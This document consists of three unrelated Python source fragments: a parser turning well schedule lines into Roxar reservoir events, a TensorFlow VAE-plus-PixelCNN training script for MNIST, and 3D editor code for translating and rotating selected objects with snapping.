# rtype = rdat[1] # Currently not used
srateo = _read_float(rdat[2], line_no)
sratew = _read_float(rdat[3], line_no)
srateg = _read_float(rdat[4], line_no)
ivfp = _read_int(rdat[5], line_no)
alq = _read_float(rdat[6], line_no)
vthp = _read_float(rdat[7], line_no)
vbhp = _read_float(rdat[8], line_no)
if vthp is not None or vbhp is not None:
eve = roxar.events.Event.create(
roxar.EventType.WHISTPRES, event_date, [well_name])
if vthp is not None:
eve['THP'] = vthp
if vbhp is not None:
eve['BHP'] = vbhp
elist.append(eve)
if srateo is not None or sratew is not None or srateg is not None:
eve = roxar.events.Event.create(
roxar.EventType.WHISTRATE, event_date, [well_name])
if srateo is not None:
eve['SRATEO'] = srateo
if sratew is not None:
eve['SRATEW'] = sratew
if srateg is not None:
eve['SRATEG'] = srateg
elist.append(eve)
if ivfp is not None:
eve = roxar.events.Event.create(
roxar.EventType.WLIFTTABLE, event_date, [well_name])
eve['TABLEID'] = str(ivfp)
elist.append(eve)
if alq is not None:
eve = roxar.events.Event.create(
roxar.EventType.WLIFTGAS, event_date, [well_name])
eve['RATEG'] = alq
elist.append(eve)
elif terms[1] == 'PERFORATION':
event_date = _read_date(terms[0], line_no, symbdate)
traj_name = [well_name, wellbore_name, trajectory_type]
eve = roxar.events.Event.create(roxar.EventType.PERF, event_date, traj_name)
try:
if terms[id2] == '*':
eve['MDSTART'] = def_mdstart
wells_def_mdstart.append(wellbore_name)
else:
eve['MDSTART'] = float(terms[id2])
if terms[id3] == '*':
eve['MDEND'] = def_mdend
wells_def_mdend.append(wellbore_name)
else:
eve['MDEND'] = float(terms[id3])
if terms[id4] != '*':
eve['RADIUS'] = 0.5*float(terms[id4])
if terms[id5] != '*':
eve['SKIN'] = float(terms[id5])
eve['PERFID'] = chr(wperfno[wellbore_name] + ord('A'))
wperfno[wellbore_name] += 1
if no_terms > id6 and terms[id6].startswith('--'):
iloc = line.find('--')
com = line[iloc+2:]
com = com.lstrip()
com = com.strip('\n')
eve['COMMENT'] = com
except ValueError:
errstr = 'Failed to read PERFORATION data in line ' + str(line_no)
raise ValueError(errstr)
elist.append(eve)
elif terms[1] == 'BAREFOOT':
event_date = _read_date(terms[0], line_no, symbdate)
traj_name = [well_name, wellbore_name, trajectory_type]
eve = roxar.events.Event.create(roxar.EventType.PERF, event_date, traj_name)
| |
"""
Multilayer VAE + Pixel CNN
<NAME>
"""
import os, sys
if 'ISHAAN_NN_LIB' in os.environ:
sys.path.append(os.environ['ISHAAN_NN_LIB'])
else:
sys.path.append(os.getcwd())
N_GPUS = 1
try: # This only matters on Ishaan's computer
import experiment_tools
experiment_tools.wait_for_gpu(tf=True, n_gpus=N_GPUS)
except ImportError:
pass
import tflib as lib
import tflib.debug
import tflib.train_loop_2
import tflib.ops.kl_unit_gaussian
import tflib.ops.kl_gaussian_gaussian
import tflib.ops.conv2d
import tflib.ops.deconv2d
import tflib.ops.linear
import tflib.ops.batchnorm
import tflib.ops.embedding
from sklearn.svm import LinearSVC
from sklearn.svm import SVC
from sklearn.linear_model import LogisticRegression
# import tflib.lsun_bedrooms
import tflib.mnist_256
# import tflib.small_imagenet
# import tflib.svhn
# import knn
import sklearn.neighbors
import numpy as np
import tensorflow as tf
import scipy.misc
from scipy.misc import imsave
import time
import functools
import matplotlib
matplotlib.use('Agg')
from matplotlib import pyplot as plt
# two_level uses Enc1/Dec1 for the bottom level, Enc2/Dec2 for the top level
# one_level uses EncFull/DecFull for the bottom (and only) level
MODE = 'one_level'
PIXEL_LEVEL_PIXCNN = True
LATENT_DIM_2 = 3
FEATURES = 'mu1'
PIXCNN_ONLY = False
EMBED_INPUTS = False
# These settings are good for a 'smaller' model that trains (up to 200K iters)
# in ~1 day on a GTX 1080 (probably equivalent to 2 K40s).
DIM_EMBED = 16
N = 1
DIM_PIX_1 = 32*N
DIM_1 = 32*N
DIM_2 = 64*N
DIM_3 = 128*N
DIM_4 = 256*N
ALPHA1_ITERS = 1000
# ALPHA2_ITERS = 5000
KL_PENALTY = 1.00
BETA_ITERS = 1000
# In Dec2, we break each spatial location into N blocks (analogous to channels
# in the original PixelCNN) and model each spatial location autoregressively
# as P(x)=P(x0)*P(x1|x0)*P(x2|x0,x1)... In my experiments values of N > 1
# actually hurt performance. Unsure why; might be a bug.
PIX_2_N_BLOCKS = 1
TIMES = {
'mode': 'iters',
'test_every': 1*1000,
'stop_after': 25*1000,
'callback_every': 1*1000
}
VANILLA = False
LR = 1e-3
LR_DECAY_AFTER = TIMES['stop_after']
LR_DECAY_FACTOR = 1.
BATCH_SIZE = 100
N_CHANNELS = 1
HEIGHT = 28
WIDTH = 28
train_data, dev_data, test_data = lib.mnist_256.load(BATCH_SIZE, BATCH_SIZE, True)
# train_data, test_data = lib.svhn.load(BATCH_SIZE)
lib.print_model_settings(locals().copy())
DEVICES = ['/gpu:{}'.format(i) for i in xrange(N_GPUS)]
lib.ops.conv2d.enable_default_weightnorm()
lib.ops.deconv2d.enable_default_weightnorm()
lib.ops.linear.enable_default_weightnorm()
with tf.Session(config=tf.ConfigProto(allow_soft_placement=True)) as session:
bn_is_training = tf.placeholder(tf.bool, shape=None, name='bn_is_training')
bn_stats_iter = tf.placeholder(tf.int32, shape=None, name='bn_stats_iter')
total_iters = tf.placeholder(tf.int32, shape=None, name='total_iters')
all_images = tf.placeholder(tf.int32, shape=[None, N_CHANNELS, HEIGHT, WIDTH], name='all_images')
all_labels = tf.placeholder(tf.int32, shape=[None], name='all_labels')
# all_labelled = tf.placeholder(tf.int32, shape=[None], name='all_labelled')
# all_latents1 = tf.placeholder(tf.float32, shape=[None, LATENT_DIM_1, LATENTS1_HEIGHT, LATENTS1_WIDTH], name='all_latents1')
split_images = tf.split(0, len(DEVICES), all_images)
split_labels = tf.split(0, len(DEVICES), all_labels)
# split_labelled = tf.split(0, len(DEVICES), all_labelled)
# split_latents1 = tf.split(0, len(DEVICES), all_latents1)
tower_cost = []
tower_outputs1_sample = []
for device_index, (device, images, labels) in enumerate(zip(DEVICES, split_images, split_labels)):
with tf.device(device):
def nonlinearity(x):
return tf.nn.elu(x)
def pixcnn_gated_nonlinearity(a, b):
# return tf.sigmoid(a) * b
return tf.sigmoid(a) * tf.tanh(b)
def SubpixelConv2D(*args, **kwargs):
kwargs['output_dim'] = 4*kwargs['output_dim']
output = lib.ops.conv2d.Conv2D(*args, **kwargs)
output = tf.transpose(output, [0,2,3,1])
output = tf.depth_to_space(output, 2)
output = tf.transpose(output, [0,3,1,2])
return output
def ResidualBlock(name, input_dim, output_dim, inputs, inputs_stdev, filter_size, mask_type=None, resample=None, he_init=True):
"""
resample: None, 'down', or 'up'
"""
if mask_type != None and resample != None:
raise Exception('Unsupported configuration')
if resample=='down':
conv_shortcut = functools.partial(lib.ops.conv2d.Conv2D, stride=2)
conv_1 = functools.partial(lib.ops.conv2d.Conv2D, input_dim=input_dim, output_dim=input_dim)
conv_2 = functools.partial(lib.ops.conv2d.Conv2D, input_dim=input_dim, output_dim=output_dim, stride=2)
elif resample=='up':
conv_shortcut = SubpixelConv2D
conv_1 = functools.partial(SubpixelConv2D, input_dim=input_dim, output_dim=output_dim)
conv_2 = functools.partial(lib.ops.conv2d.Conv2D, input_dim=output_dim, output_dim=output_dim)
elif resample==None:
conv_shortcut = lib.ops.conv2d.Conv2D
conv_1 = functools.partial(lib.ops.conv2d.Conv2D, input_dim=input_dim, output_dim=output_dim)
conv_2 = functools.partial(lib.ops.conv2d.Conv2D, input_dim=output_dim, output_dim=output_dim)
else:
raise Exception('invalid resample value')
if output_dim==input_dim and resample==None:
shortcut = inputs # Identity skip-connection
else:
shortcut = conv_shortcut(name+'.Shortcut', input_dim=input_dim, output_dim=output_dim, filter_size=1, mask_type=mask_type, he_init=False, biases=True, inputs=inputs)
output = inputs
if mask_type == None:
output = nonlinearity(output)
output = conv_1(name+'.Conv1', filter_size=filter_size, mask_type=mask_type, inputs=output, he_init=he_init, weightnorm=False)
output = nonlinearity(output)
output = conv_2(name+'.Conv2', filter_size=filter_size, mask_type=mask_type, inputs=output, he_init=he_init, weightnorm=False, biases=False)
if device_index == 0:
output = lib.ops.batchnorm.Batchnorm(name+'.BN', [0,2,3], output, bn_is_training, bn_stats_iter)
else:
output = lib.ops.batchnorm.Batchnorm(name+'.BN', [0,2,3], output, bn_is_training, bn_stats_iter, update_moving_stats=False)
else:
output = nonlinearity(output)
output_a = conv_1(name+'.Conv1A', filter_size=filter_size, mask_type=mask_type, inputs=output, he_init=he_init)
output_b = conv_1(name+'.Conv1B', filter_size=filter_size, mask_type=mask_type, inputs=output, he_init=he_init)
output = pixcnn_gated_nonlinearity(output_a, output_b)
output = conv_2(name+'.Conv2', filter_size=filter_size, mask_type=mask_type, inputs=output, he_init=he_init)
return shortcut + output
def EncFull(images):
output = images
if EMBED_INPUTS:
output = lib.ops.conv2d.Conv2D('EncFull.Input', input_dim=N_CHANNELS*DIM_EMBED, output_dim=DIM_1, filter_size=1, inputs=output, he_init=False)
else:
output = lib.ops.conv2d.Conv2D('EncFull.Input', input_dim=N_CHANNELS, output_dim=DIM_1, filter_size=1, inputs=output, he_init=False)
output = ResidualBlock('EncFull.Res1', input_dim=DIM_1, output_dim=DIM_1, filter_size=3, resample=None, inputs_stdev=1, inputs=output)
output = ResidualBlock('EncFull.Res2', input_dim=DIM_1, output_dim=DIM_2, filter_size=3, resample='down', inputs_stdev=1, inputs=output)
output = ResidualBlock('EncFull.Res3', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, inputs_stdev=np.sqrt(2), inputs=output)
output = ResidualBlock('EncFull.Res4', input_dim=DIM_2, output_dim=DIM_3, filter_size=3, resample='down', inputs_stdev=np.sqrt(2), inputs=output)
output = ResidualBlock('EncFull.Res5', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, inputs_stdev=np.sqrt(3), inputs=output)
output = ResidualBlock('EncFull.Res6', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, inputs_stdev=np.sqrt(3), inputs=output)
# output = ResidualBlock('EncFull.Res7', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample='down', inputs_stdev=np.sqrt(3), inputs=output)
# output = tf.reshape(output, [-1, 4*4*DIM_3])
# output = lib.ops.linear.Linear('EncFull.Output', input_dim=4*4*DIM_3, output_dim=2*LATENT_DIM_2, initialization='glorot', inputs=output)
output = tf.reduce_mean(output, reduction_indices=[2,3])
output = lib.ops.linear.Linear('EncFull.Output', input_dim=DIM_3, output_dim=2*LATENT_DIM_2, initialization='glorot', inputs=output)
# output = ResidualBlock('EncFull.Res3', input_dim=DIM_3, output_dim=DIM_4, filter_size=3, resample='down', inputs_stdev=np.sqrt(3), inputs=output)
# output = ResidualBlock('EncFull.Res4Pre', input_dim=DIM_4, output_dim=DIM_4, filter_size=3, resample=None, inputs_stdev=np.sqrt(4), inputs=output)
# output = tf.reshape(output, [-1, 4*4*DIM_4])
# output = lib.ops.linear.Linear('EncFull.ConvToFC', input_dim=4*4*DIM_4, output_dim=2*LATENT_DIM_2, initialization='glorot', inputs=output)
return output
def DecFull(latents, images):
output = tf.clip_by_value(latents, -50., 50.)
# output = lib.ops.linear.Linear('DecFull.Input', input_dim=LATENT_DIM_2, output_dim=DIM_1, initialization='glorot', inputs=output)
# output = tf.reshape(tf.tile(tf.reshape(output, [-1, DIM_1, 1]), [1, 1, 28*28]), [-1, DIM_1, 28, 28])
output = lib.ops.linear.Linear('DecFull.Input', input_dim=LATENT_DIM_2, output_dim=DIM_3, initialization='glorot', inputs=output)
output = tf.reshape(tf.tile(tf.reshape(output, [-1, DIM_3, 1]), [1, 1, 49]), [-1, DIM_3, 7, 7])
# output = lib.ops.linear.Linear('DecFull.Input', input_dim=LATENT_DIM_2, output_dim=4*4*DIM_3, initialization='glorot', inputs=output)
# output = tf.reshape(output, [-1, DIM_3, 4, 4])
# output = ResidualBlock('DecFull.Res1', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample='up', inputs_stdev=np.sqrt(3), he_init=True, inputs=output)
# output = output[:, :, :7, :7]
output = ResidualBlock('DecFull.Res2', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, inputs_stdev=np.sqrt(3), he_init=True, inputs=output)
output = ResidualBlock('DecFull.Res3', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, inputs_stdev=np.sqrt(3), he_init=True, inputs=output)
output = ResidualBlock('DecFull.Res4', input_dim=DIM_3, output_dim=DIM_2, filter_size=3, resample='up', inputs_stdev=np.sqrt(4), he_init=True, inputs=output)
output = ResidualBlock('DecFull.Res5', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, inputs_stdev=np.sqrt(4), he_init=True, inputs=output)
output = ResidualBlock('DecFull.Res6', input_dim=DIM_2, output_dim=DIM_1, filter_size=3, resample='up', inputs_stdev=np.sqrt(5), he_init=True, inputs=output)
output = ResidualBlock('DecFull.Res7', input_dim=DIM_1, output_dim=DIM_1, filter_size=3, resample=None, inputs_stdev=np.sqrt(5), he_init=True, inputs=output)
# output = lib.ops.linear.Linear('DecFull.Input', input_dim=LATENT_DIM_2, output_dim=4*4*DIM_4, initialization='glorot', inputs=output)
# output = tf.reshape(output, [-1, DIM_4, 4, 4])
# output = ResidualBlock('DecFull.Res2Post', input_dim=DIM_4, output_dim=DIM_4, filter_size=3, resample=None, inputs_stdev=np.sqrt(3), he_init=True, inputs=output)
# output = ResidualBlock('DecFull.Res3', input_dim=DIM_4, output_dim=DIM_3, filter_size=3, resample='up', inputs_stdev=np.sqrt(3), he_init=True, inputs=output)
# output = ResidualBlock('DecFull.Res3Post', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, inputs_stdev=np.sqrt(3), he_init=True, inputs=output)
# output = ResidualBlock('DecFull.Res4', input_dim=DIM_3, output_dim=DIM_2, filter_size=3, resample='up', inputs_stdev=np.sqrt(4), he_init=True, inputs=output)
# output = ResidualBlock('DecFull.Res4Post', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, inputs_stdev=np.sqrt(4), he_init=True, inputs=output)
# output = ResidualBlock('DecFull.Res5', input_dim=DIM_2, output_dim=DIM_1, filter_size=3, resample='up', inputs_stdev=np.sqrt(5), he_init=True, inputs=output)
# output = ResidualBlock('DecFull.Res5Post', input_dim=DIM_1, output_dim=DIM_1, filter_size=3, resample=None, inputs_stdev=np.sqrt(5), he_init=True, inputs=output)
# position-invariant latent projection
# output = lib.ops.linear.Linear('DecFull.Input', input_dim=LATENT_DIM_2, output_dim=DIM_1, initialization='glorot', inputs=output)
# output = tf.tile(output, [1, HEIGHT*WIDTH])
# output = tf.reshape(output, [-1, DIM_1, HEIGHT, WIDTH])
if PIXEL_LEVEL_PIXCNN:
if EMBED_INPUTS:
masked_images = lib.ops.conv2d.Conv2D('DecFull.Pix1', input_dim=N_CHANNELS*DIM_EMBED, output_dim=DIM_1, filter_size=3, inputs=images, mask_type=('a', N_CHANNELS), he_init=False)
else:
masked_images = lib.ops.conv2d.Conv2D('DecFull.Pix1', input_dim=N_CHANNELS, output_dim=DIM_1, filter_size=3, inputs=images, mask_type=('a', N_CHANNELS), he_init=False)
# Make the stdev of output and masked_images match
# output /= np.sqrt(6)
# Warning! Because of the masked convolutions it's very important that masked_images comes first in this concat
output = tf.concat(1, [masked_images, output])
output = ResidualBlock('DecFull.Pix2Res', input_dim=2*DIM_1, output_dim=DIM_PIX_1, filter_size=1, mask_type=('b', N_CHANNELS), inputs_stdev=1, inputs=output)
# output = ResidualBlock('DecFull.Pix2Res', input_dim=2*DIM_1, output_dim=DIM_PIX_1, filter_size=3, mask_type=('b', N_CHANNELS), inputs_stdev=1, inputs=output)
# output = ResidualBlock('DecFull.Pix3Res', input_dim=DIM_PIX_1, output_dim=DIM_PIX_1, filter_size=3, mask_type=('b', N_CHANNELS), inputs_stdev=np.sqrt(2), inputs=output)
# output = ResidualBlock('DecFull.Pix4Res', input_dim=DIM_PIX_1, output_dim=DIM_PIX_1, filter_size=3, mask_type=('b', N_CHANNELS), inputs_stdev=np.sqrt(2), inputs=output)
# output = ResidualBlock('DecFull.Pix5Res', input_dim=DIM_PIX_1, output_dim=DIM_PIX_1, filter_size=3, mask_type=('b', N_CHANNELS), inputs_stdev=np.sqrt(2), inputs=output)
output = lib.ops.conv2d.Conv2D('Dec1.Out', input_dim=DIM_PIX_1, output_dim=256*N_CHANNELS, filter_size=1, mask_type=('b', N_CHANNELS), he_init=False, inputs=output)
else:
output = lib.ops.conv2d.Conv2D('Dec1.Out', input_dim=DIM_1, output_dim=256*N_CHANNELS, filter_size=1, he_init=False, inputs=output)
return tf.transpose(
tf.reshape(output, [-1, 256, N_CHANNELS, HEIGHT, WIDTH]),
[0,2,3,4,1]
)
def split(mu_and_logsig):
mu, logsig = tf.split(1, 2, mu_and_logsig)
# Restrict sigma to [0,1] and mu to [-2, 2]
# mu = 2. * tf.tanh(mu / 2.)
sig = 0.5 * (tf.nn.softsign(logsig)+1)
logsig = tf.log(sig)
return mu, logsig, sig
def clamp_logsig_and_sig(logsig, sig):
# Early during training (see BETA_ITERS), stop sigma from going too low
floor = 1. - tf.minimum(1., tf.cast(total_iters, 'float32') / BETA_ITERS)
log_floor = tf.log(floor)
return tf.maximum(logsig, log_floor), tf.maximum(sig, floor)
scaled_images = (tf.cast(images, 'float32') - 128.) / 64.
embedded_images = lib.ops.embedding.Embedding('Embedding', 256, DIM_EMBED, images)
embedded_images = tf.transpose(embedded_images, [0,4,1,2,3])
embedded_images = tf.reshape(embedded_images, [-1, DIM_EMBED*N_CHANNELS, HEIGHT, WIDTH])
if MODE == 'one_level':
# Layer 1
if EMBED_INPUTS:
mu_and_logsig1 = EncFull(embedded_images)
else:
mu_and_logsig1 = EncFull(scaled_images)
mu1, logsig1, sig1 = split(mu_and_logsig1)
if VANILLA:
latents1 = mu1
else:
eps = tf.random_normal(tf.shape(mu1))
latents1 = mu1 + (eps * sig1)
if EMBED_INPUTS:
outputs1 = DecFull(latents1, embedded_images)
else:
outputs1 = DecFull(latents1, scaled_images)
reconst_cost = tf.reduce_mean(
tf.nn.sparse_softmax_cross_entropy_with_logits(
tf.reshape(outputs1, [-1, 256]),
tf.reshape(images, [-1])
)
)
# Assembly
# An alpha of exactly 0 can sometimes cause inf/nan values, so we're
# careful | |
cam = GD.cam()
lens_type = GD.cam.lens_type
near_point = Point3()
far_point = Point3()
GD.cam.lens.extrude(screen_pos, near_point, far_point)
rel_pt = lambda point: grid_origin.get_relative_point(cam, point)
near_point = rel_pt(near_point)
far_point = rel_pt(far_point)
if lens_type == "persp":
# the selected items should not move if the cursor points away from the
# plane of translation
if V3D(far_point - near_point) * self._transf_plane_normal < .0001:
Mgr.do("set_projected_snap_marker_pos", None)
return task.cont
point = Point3()
if self._transf_plane.intersects_line(point, near_point, far_point):
pos = grid_origin.get_relative_point(GD.world, self._transf_start_pos)
translation_vec = point - pos
else:
Mgr.do("set_projected_snap_marker_pos", None)
return task.cont
if self._transf_axis is not None:
if not snap_target_point or snap_settings["use_axis_constraints"]["translate"]:
translation_vec = translation_vec.project(self._transf_axis)
if snap_on and snap_tgt_type == "increment":
axis_constraints = GD["axis_constraints"]["translate"]
offset_incr = snap_settings["increment"]["translate"]
if axis_constraints == "view":
translation_vec = cam.get_relative_vector(grid_origin, translation_vec)
offset_incr /= cam.get_sx(grid_origin)
x, y, z = translation_vec
x = round(x / offset_incr) * offset_incr
y = round(y / offset_incr) * offset_incr
z = round(z / offset_incr) * offset_incr
translation_vec = Vec3(x, y, z)
if axis_constraints == "view":
translation_vec = grid_origin.get_relative_vector(cam, translation_vec)
if snap_on and snap_settings["use_axis_constraints"]["translate"]:
if snap_target_point:
pos = GD.world.get_relative_point(grid_origin, pos + translation_vec)
Mgr.do("set_projected_snap_marker_pos", pos)
else:
Mgr.do("set_projected_snap_marker_pos", None)
if GD["active_obj_level"] == "top":
self._selection.translate(self._objs_to_transform, translation_vec)
else:
self._selection.translate(translation_vec)
Mgr.do("transform_point_helpers")
return task.cont
def __init_rotation(self):
grid_origin = Mgr.get("grid").origin
axis_constraints = GD["axis_constraints"]["rotate"]
rotation_options = GD["transform_options"]["rotation"]
cam = GD.cam()
lens_type = GD.cam.lens_type
cam_pos = cam.get_pos(GD.world)
cam_vec = V3D(GD.world.get_relative_vector(cam, Vec3.forward()).normalized())
if axis_constraints == "view":
normal = cam_vec
self._screen_axis_vec = grid_origin.get_relative_vector(cam, Vec3.forward())
if not self._screen_axis_vec.normalize():
return
else:
axis_index = "xyz".index(axis_constraints)
axis1_index = axis_index - 2
axis2_index = axis_index - 1
axis1_vec = V3D()
axis1_vec[axis1_index] = 1.
axis2_vec = V3D()
axis2_vec[axis2_index] = 1.
axis1_vec = V3D(GD.world.get_relative_vector(grid_origin, axis1_vec))
axis2_vec = V3D(GD.world.get_relative_vector(grid_origin, axis2_vec))
normal = axis1_vec ** axis2_vec
if not normal.normalize():
return
self._rot_origin = Mgr.get("transf_center_pos")
self._transf_plane = Plane(normal, self._rot_origin)
drag_in_view_plane = False
drag_linear = rotation_options["drag_method"] == "linear"
if not drag_linear:
method_switch_threshold = rotation_options["method_switch_threshold"]
drag_method = rotation_options["drag_method"]
drag_in_view_plane = drag_method != "circular_in_rot_plane"
angle = max(cam_vec.angle_deg(normal), cam_vec.angle_deg(-normal)) - 90.
if axis_constraints != "view" and angle < method_switch_threshold:
drag_in_view_plane = True
drag_linear = rotation_options["alt_method"] == "linear"
self._drag_in_view_plane = drag_in_view_plane or drag_linear
self._drag_linear = drag_linear
snap_settings = GD["snap"]
snap_on = snap_settings["on"]["rotate"]
snap_tgt_type = snap_settings["tgt_type"]["rotate"]
if snap_on and snap_tgt_type != "increment":
rot_start_pos = self._transf_plane.project(self._transf_start_pos)
else:
rot_start_pos = Point3()
if lens_type == "persp":
line_start = cam_pos
else:
line_start = cam.get_relative_point(GD.world, self._transf_start_pos)
line_start.y -= 1000.
line_start = GD.world.get_relative_point(cam, line_start)
if not (self._transf_plane.intersects_line(rot_start_pos,
line_start, self._transf_start_pos) or self._drag_in_view_plane):
return
Mgr.do("init_rotation_gizmo_angle", rot_start_pos)
rot_start_vec = V3D(rot_start_pos - self._rot_origin)
rot_ref_vec = normal ** rot_start_vec
self._rot_start_vecs = (rot_start_vec, rot_ref_vec)
if not rot_start_vec.normalize():
return
if lens_type == "persp":
if normal * V3D(self._transf_plane.project(cam_pos) - cam_pos) < .0001:
normal *= -1.
if (not snap_on or snap_tgt_type == "increment") and (lens_type == "persp"
and not self._drag_in_view_plane):
# no rotation can occur if the cursor points away from the plane of
# rotation
if V3D(self._transf_start_pos - cam_pos) * normal < .0001:
return
if snap_on and snap_tgt_type == "increment":
self._snap_start_vecs = (V3D(rot_start_vec), V3D(rot_ref_vec))
self._total_angle = 0.
else:
self._total_angle = None
self._transf_plane_normal = normal
if GD["active_obj_level"] == "top":
self._selection.init_rotation(self._objs_to_transform)
else:
self._selection.init_rotation()
if self._drag_in_view_plane:
w, h = GD["viewport"]["size_aux"
if GD["viewport"][2] == "main" else "size"]
point = cam.get_relative_point(GD.world, self._rot_origin)
screen_pos = Point2()
GD.cam.lens.project(point, screen_pos)
x, y = screen_pos
x = (x + 1.) * .5 * w
y = -(1. - (y + 1.) * .5) * h
center = Point3(x, 0., y)
point = cam.get_relative_point(GD.world, self._transf_start_pos)
screen_pos = Point2()
GD.cam.lens.project(point, screen_pos)
x, y = screen_pos
x = (x + 1.) * .5 * w
y = -(1. - (y + 1.) * .5) * h
point = Point3(x, 0., y)
vec = point - center
angle = Vec3(1., 0., 0.).signed_angle_deg(vec.normalized(), Vec3(0., 1., 0.))
if drag_linear:
viz = self._rotation_viz["linear"]
viz.set_pos(point)
if not rotation_options["line_thru_gizmo_center"]:
x, y = GD["viewport"]["pos_aux"
if GD["viewport"][2] == "main" else "pos"]
mouse_pointer = Mgr.get("mouse_pointer", 0)
mouse_x, mouse_y = mouse_pointer.x, mouse_pointer.y
point2 = Point3(mouse_x - x, 0., -mouse_y + y)
vec = point2 - point
angle = Vec3(1., 0., 0.).signed_angle_deg(vec.normalized(), Vec3(0., 1., 0.))
viz.set_r(angle)
else:
viz = self._rotation_viz["circular"]
viz.set_r(angle)
if rotation_options["circle_center"] == "gizmo_center":
viz.set_pos(center)
else:
viz.set_pos(point)
if rotation_options["show_circle"]:
if not rotation_options["scale_circle_to_cursor"]:
viz.set_scale(rotation_options["circle_radius"])
elif rotation_options["circle_center"] == "gizmo_center":
viz.set_scale(vec.length())
else:
viz.set_scale(.1)
if rotation_options["show_line" if drag_linear else "show_circle"]:
if axis_constraints == "view":
color = (.5, .5, .5, 1.)
else:
color = VBase4()
color["xyz".index(axis_constraints)] = 1.
tex_stage = TextureStage.default
tex = viz.get_texture(tex_stage)
sampler = SamplerState(tex.default_sampler)
sampler.border_color = color
tex.default_sampler = sampler
viz.reparent_to(GD.viewport_origin)
Mgr.add_task(self.__rotate_selection, "transform_selection", sort=3)
def __rotate_selection(self, task):
# To rotate selected items, the new orientation is computed as the
# starting orientation with an angle added to it. This angle is measured
# in the plane of rotation (whose normal points in the direction of the
# chosen axis of rotation) between two vectors: the starting vector and the
# current vector, both originating at the center of transformation.
# The starting vector points to the initial "mouse ray"-item intersection
# point, while the current vector points to the current intersection of the
# mouse ray and the plane of rotation.
rotation_vec = None
snap_settings = GD["snap"]
snap_on = snap_settings["on"]["rotate"]
snap_tgt_type = snap_settings["tgt_type"]["rotate"]
snap_target_point = None
axis_constraints = GD["axis_constraints"]["rotate"]
rotation_options = GD["transform_options"]["rotation"]
drag_in_view_plane = self._drag_in_view_plane
drag_linear = self._drag_linear
grid_origin = Mgr.get("grid").origin
if drag_in_view_plane:
viz = self._rotation_viz["linear" if drag_linear else "circular"]
show_viz = rotation_options["show_line" if drag_linear else "show_circle"]
viz.show() if show_viz else viz.hide()
if snap_on and snap_tgt_type != "increment":
snap_target_point = Mgr.get("snap_target_point")
if snap_target_point:
snap_target_point = GD.world.get_relative_point(grid_origin, snap_target_point)
pos = self._transf_plane.project(snap_target_point)
rotation_vec = V3D(pos - self._rot_origin)
if drag_in_view_plane:
viz.hide()
if not rotation_vec.normalize():
Mgr.do("set_projected_snap_marker_pos", None)
return task.cont
if snap_settings["use_axis_constraints"]["rotate"]:
if snap_target_point:
Mgr.do("set_projected_snap_marker_pos", pos)
else:
Mgr.do("set_projected_snap_marker_pos", None)
if rotation_vec is None:
if not GD.mouse_watcher.has_mouse():
Mgr.do("set_projected_snap_marker_pos", None)
return task.cont
cam = GD.cam()
lens_type = GD.cam.lens_type
if drag_in_view_plane:
x, y = GD["viewport"]["pos_aux"
if GD["viewport"][2] == "main" else "pos"]
mouse_pointer = Mgr.get("mouse_pointer", 0)
mouse_x, mouse_y = mouse_pointer.x, mouse_pointer.y
point = Point3(mouse_x - x, 0., -mouse_y + y)
vec = V3D(point - viz.get_pos())
if show_viz and not drag_linear and rotation_options["scale_circle_to_cursor"]:
viz.set_scale(max(1., vec.length()))
if drag_linear:
dir_vec = Vec3(1., 0., 0.) * viz.get_scale()[0]
dir_vec = GD.viewport_origin.get_relative_vector(viz, dir_vec)
full_roll_dist = rotation_options["full_roll_dist"]
angle = vec.project(dir_vec).length() * 360. / full_roll_dist
if vec * dir_vec < 0.:
angle *= -1.
angle_offset = angle // 360. + 1.
viz.set_scale(-1.)
use_angle_complement = True
else:
angle_offset = angle // 360.
viz.set_scale(1.)
use_angle_complement = False
else:
angle = Vec3.right().signed_angle_deg(vec.normalized(), Vec3.forward())
angle -= viz.get_r()
if axis_constraints == "view":
use_angle_complement = False
else:
vec = V3D()
vec["xyz".index(axis_constraints)] = 1.
if vec * grid_origin.get_relative_vector(GD.cam(), Vec3.forward()) < 0.:
angle *= -1.
use_angle_complement = True
else:
use_angle_complement = False
quat = Quat()
if axis_constraints == "view":
quat.set_from_axis_angle(angle, self._screen_axis_vec)
else:
hpr = VBase3()
hpr["zxy".index(axis_constraints)] = angle
quat.set_hpr(hpr)
vec = quat.xform(self._rot_start_vecs[0])
point = self._rot_origin + vec
near_point = point - self._transf_plane_normal
far_point = point + self._transf_plane_normal
else:
screen_pos = GD.mouse_watcher.get_mouse()
near_point = Point3()
far_point = Point3()
GD.cam.lens.extrude(screen_pos, near_point, far_point)
rel_pt = lambda point: GD.world.get_relative_point(cam, point)
near_point = rel_pt(near_point)
far_point = rel_pt(far_point)
if lens_type == "persp":
# the selected items should not rotate if the cursor points away from the
# plane of rotation
if V3D(far_point - near_point) * self._transf_plane_normal < .0001:
Mgr.do("set_projected_snap_marker_pos", None)
return task.cont
point = Point3()
if self._transf_plane.intersects_line(point, near_point, far_point):
rotation_vec = V3D(point - self._rot_origin)
if not rotation_vec.normalize():
Mgr.do("set_projected_snap_marker_pos", None)
return task.cont
if snap_on and snap_tgt_type == "increment":
angle_incr = snap_settings["increment"]["rotate"]
snap_vec, snap_ref_vec = self._snap_start_vecs
a = rotation_vec.angle_deg(snap_vec)
if a > angle_incr * .75:
n = (1 + a // angle_incr)
if rotation_vec * snap_ref_vec < 0.:
n *= -1.
# rotate both snap_vec and snap_ref_vec about the rotation plane
# normal by an angle equal to angle_incr * n
angle = angle_incr * n
self._total_angle += angle
q = Quat()
q.set_from_axis_angle(angle, self._transf_plane.get_normal())
snap_vec = V3D(q.xform(snap_vec))
self._snap_start_vecs = (snap_vec, V3D(q.xform(snap_ref_vec)))
rotation_vec = snap_vec
if rotation_vec is not None:
angle = self._rot_start_vecs[0].angle_deg(rotation_vec)
if self._rot_start_vecs[1] * rotation_vec < 0. and angle > .001:
angle = 360. - angle
rotation = Quat()
if axis_constraints == "view":
rotation.set_from_axis_angle(angle, self._screen_axis_vec)
else:
